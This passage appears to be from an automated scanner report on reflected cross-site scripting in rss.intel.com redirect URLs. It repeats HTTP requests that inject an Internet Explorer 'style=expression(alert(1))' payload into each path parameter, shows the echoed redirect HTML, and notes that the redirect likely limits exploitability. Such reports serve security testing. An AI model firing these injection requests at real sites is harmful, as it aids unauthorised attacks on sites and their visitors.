Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31bac26"style="x:expression(alert(1))"4f9f28749e/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry?cid=rss-182178-c1-264136"> ...[SNIP]...
The value of REST URL parameter 10 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28736"style%3d"x%3aexpression(alert(1))"42af1674784 was submitted in the REST URL parameter 10. This input was echoed as 28736"style="x:expression(alert(1))"42af1674784 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-182178-c1-264138/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard28736"style%3d"x%3aexpression(alert(1))"42af1674784 HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard28736"style="x:expression(alert(1))"42af1674784?cid=rss-182178-c1-264138"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c387"style%3d"x%3aexpression(alert(1))"2f6f6c3797a was submitted in the REST URL parameter 2. This input was echoed as 1c387"style="x:expression(alert(1))"2f6f6c3797a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-182178-c1-2641381c387"style%3d"x%3aexpression(alert(1))"2f6f6c3797a/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard?cid=rss-182178-c1-2641381c387"style="x:expression(alert(1))"2f6f6c3797a"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d31a"style%3d"x%3aexpression(alert(1))"60bb2fac834 was submitted in the REST URL parameter 3. This input was echoed as 1d31a"style="x:expression(alert(1))"60bb2fac834 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-182178-c1-264138/newsroom.intel.com1d31a"style%3d"x%3aexpression(alert(1))"60bb2fac834/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The URL has moved <a href="http://newsroom.intel.com1d31a"style="x:expression(alert(1))"60bb2fac834/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65b1a"style%3d"x%3aexpression(alert(1))"b8c17ee6eac was submitted in the REST URL parameter 4. This input was echoed as 65b1a"style="x:expression(alert(1))"b8c17ee6eac in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-182178-c1-264138/newsroom.intel.com/community65b1a"style%3d"x%3aexpression(alert(1))"b8c17ee6eac/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The URL has moved <a href="http://newsroom.intel.com/community65b1a"style="x:expression(alert(1))"b8c17ee6eac/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard?cid=rss-182178-c1-264138"> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69694"style%3d"x%3aexpression(alert(1))"cb56d7389f was submitted in the REST URL parameter 5. This input was echoed as 69694"style="x:expression(alert(1))"cb56d7389f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-182178-c1-264138/newsroom.intel.com/community/intel_newsroom69694"style%3d"x%3aexpression(alert(1))"cb56d7389f/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom69694"style="x:expression(alert(1))"cb56d7389f/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard?cid=rss-182178-c1-264138"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c12c9"style%3d"x%3aexpression(alert(1))"c871cd23475 was submitted in the REST URL parameter 6. This input was echoed as c12c9"style="x:expression(alert(1))"c871cd23475 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-182178-c1-264138/newsroom.intel.com/community/intel_newsroom/blogc12c9"style%3d"x%3aexpression(alert(1))"c871cd23475/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blogc12c9"style="x:expression(alert(1))"c871cd23475/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard?cid=rss-182178-c1-264138"> ...[SNIP]...
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8552d"style%3d"x%3aexpression(alert(1))"1e321e64d44 was submitted in the REST URL parameter 7. This input was echoed as 8552d"style="x:expression(alert(1))"1e321e64d44 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-182178-c1-264138/newsroom.intel.com/community/intel_newsroom/blog/20118552d"style%3d"x%3aexpression(alert(1))"1e321e64d44/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/20118552d"style="x:expression(alert(1))"1e321e64d44/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard?cid=rss-182178-c1-264138"> ...[SNIP]...
The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e56d"style%3d"x%3aexpression(alert(1))"ea92235af50 was submitted in the REST URL parameter 8. This input was echoed as 8e56d"style="x:expression(alert(1))"ea92235af50 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-182178-c1-264138/newsroom.intel.com/community/intel_newsroom/blog/2011/028e56d"style%3d"x%3aexpression(alert(1))"ea92235af50/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/028e56d"style="x:expression(alert(1))"ea92235af50/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard?cid=rss-182178-c1-264138"> ...[SNIP]...
The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fafef"style%3d"x%3aexpression(alert(1))"e2545db63fb was submitted in the REST URL parameter 9. This input was echoed as fafef"style="x:expression(alert(1))"e2545db63fb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-182178-c1-264138/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01fafef"style%3d"x%3aexpression(alert(1))"e2545db63fb/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/01fafef"style="x:expression(alert(1))"e2545db63fb/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard?cid=rss-182178-c1-264138"> ...[SNIP]...
The value of REST URL parameter 10 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb668"style%3d"x%3aexpression(alert(1))"6213d7b7402 was submitted in the REST URL parameter 10. This input was echoed as eb668"style="x:expression(alert(1))"6213d7b7402 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-182178-c1-264171/newsroom.intel.com/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radioeb668"style%3d"x%3aexpression(alert(1))"6213d7b7402 HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radioeb668"style="x:expression(alert(1))"6213d7b7402?cid=rss-182178-c1-264171"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9eca7"style%3d"x%3aexpression(alert(1))"a9ac5ac8d70 was submitted in the REST URL parameter 2. This input was echoed as 9eca7"style="x:expression(alert(1))"a9ac5ac8d70 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-182178-c1-2641719eca7"style%3d"x%3aexpression(alert(1))"a9ac5ac8d70/newsroom.intel.com/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio?cid=rss-182178-c1-2641719eca7"style="x:expression(alert(1))"a9ac5ac8d70"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bbb04"style%3d"x%3aexpression(alert(1))"01502404417 was submitted in the REST URL parameter 3. This input was echoed as bbb04"style="x:expression(alert(1))"01502404417 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-182178-c1-264171/newsroom.intel.combbb04"style%3d"x%3aexpression(alert(1))"01502404417/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The URL has moved <a href="http://newsroom.intel.combbb04"style="x:expression(alert(1))"01502404417/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5111a"style%3d"x%3aexpression(alert(1))"83dfca4f7dc was submitted in the REST URL parameter 4. This input was echoed as 5111a"style="x:expression(alert(1))"83dfca4f7dc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-182178-c1-264171/newsroom.intel.com/community5111a"style%3d"x%3aexpression(alert(1))"83dfca4f7dc/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/community5111a"style="x:expression(alert(1))"83dfca4f7dc/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio?cid=rss-182178-c1-264171"> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d438a"style%3d"x%3aexpression(alert(1))"543ef26b9c4 was submitted in the REST URL parameter 5. This input was echoed as d438a"style="x:expression(alert(1))"543ef26b9c4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-182178-c1-264171/newsroom.intel.com/community/intel_newsroomd438a"style%3d"x%3aexpression(alert(1))"543ef26b9c4/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroomd438a"style="x:expression(alert(1))"543ef26b9c4/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio?cid=rss-182178-c1-264171"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e1b4"style%3d"x%3aexpression(alert(1))"65332bacd22 was submitted in the REST URL parameter 6. This input was echoed as 6e1b4"style="x:expression(alert(1))"65332bacd22 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-182178-c1-264171/newsroom.intel.com/community/intel_newsroom/blog6e1b4"style%3d"x%3aexpression(alert(1))"65332bacd22/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog6e1b4"style="x:expression(alert(1))"65332bacd22/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio?cid=rss-182178-c1-264171"> ...[SNIP]...
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69bd1"style%3d"x%3aexpression(alert(1))"bfde37c43e was submitted in the REST URL parameter 7. This input was echoed as 69bd1"style="x:expression(alert(1))"bfde37c43e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-182178-c1-264171/newsroom.intel.com/community/intel_newsroom/blog/201169bd1"style%3d"x%3aexpression(alert(1))"bfde37c43e/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/201169bd1"style="x:expression(alert(1))"bfde37c43e/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio?cid=rss-182178-c1-264171"> ...[SNIP]...
The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e21a"style%3d"x%3aexpression(alert(1))"7ce44f0bd7d was submitted in the REST URL parameter 8. This input was echoed as 2e21a"style="x:expression(alert(1))"7ce44f0bd7d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-182178-c1-264171/newsroom.intel.com/community/intel_newsroom/blog/2011/022e21a"style%3d"x%3aexpression(alert(1))"7ce44f0bd7d/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/022e21a"style="x:expression(alert(1))"7ce44f0bd7d/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio?cid=rss-182178-c1-264171"> ...[SNIP]...
The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f5e1"style%3d"x%3aexpression(alert(1))"2081e06e0bf was submitted in the REST URL parameter 9. This input was echoed as 9f5e1"style="x:expression(alert(1))"2081e06e0bf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-182178-c1-264171/newsroom.intel.com/community/intel_newsroom/blog/2011/02/029f5e1"style%3d"x%3aexpression(alert(1))"2081e06e0bf/chip-shot-teach-your-children-well-fri-24-on-mashup-radio HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/029f5e1"style="x:expression(alert(1))"2081e06e0bf/chip-shot-teach-your-children-well-fri-24-on-mashup-radio?cid=rss-182178-c1-264171"> ...[SNIP]...
The value of REST URL parameter 10 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2087"style%3d"x%3aexpression(alert(1))"9f34ca0a49 was submitted in the REST URL parameter 10. This input was echoed as a2087"style="x:expression(alert(1))"9f34ca0a49 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-182178-c1-264172/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-upa2087"style%3d"x%3aexpression(alert(1))"9f34ca0a49 HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-upa2087"style="x:expression(alert(1))"9f34ca0a49?cid=rss-182178-c1-264172"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8099"style%3d"x%3aexpression(alert(1))"7fdc79223e8 was submitted in the REST URL parameter 2. This input was echoed as b8099"style="x:expression(alert(1))"7fdc79223e8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-182178-c1-264172b8099"style%3d"x%3aexpression(alert(1))"7fdc79223e8/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up?cid=rss-182178-c1-264172b8099"style="x:expression(alert(1))"7fdc79223e8"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0ea1"style%3d"x%3aexpression(alert(1))"2d8c663cb48 was submitted in the REST URL parameter 3. This input was echoed as a0ea1"style="x:expression(alert(1))"2d8c663cb48 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-182178-c1-264172/newsroom.intel.coma0ea1"style%3d"x%3aexpression(alert(1))"2d8c663cb48/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.coma0ea1"style="x:expression(alert(1))"2d8c663cb48/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up">here</a>
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37f9d"style%3d"x%3aexpression(alert(1))"5528cd11f2e was submitted in the REST URL parameter 4. This input was echoed as 37f9d"style="x:expression(alert(1))"5528cd11f2e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
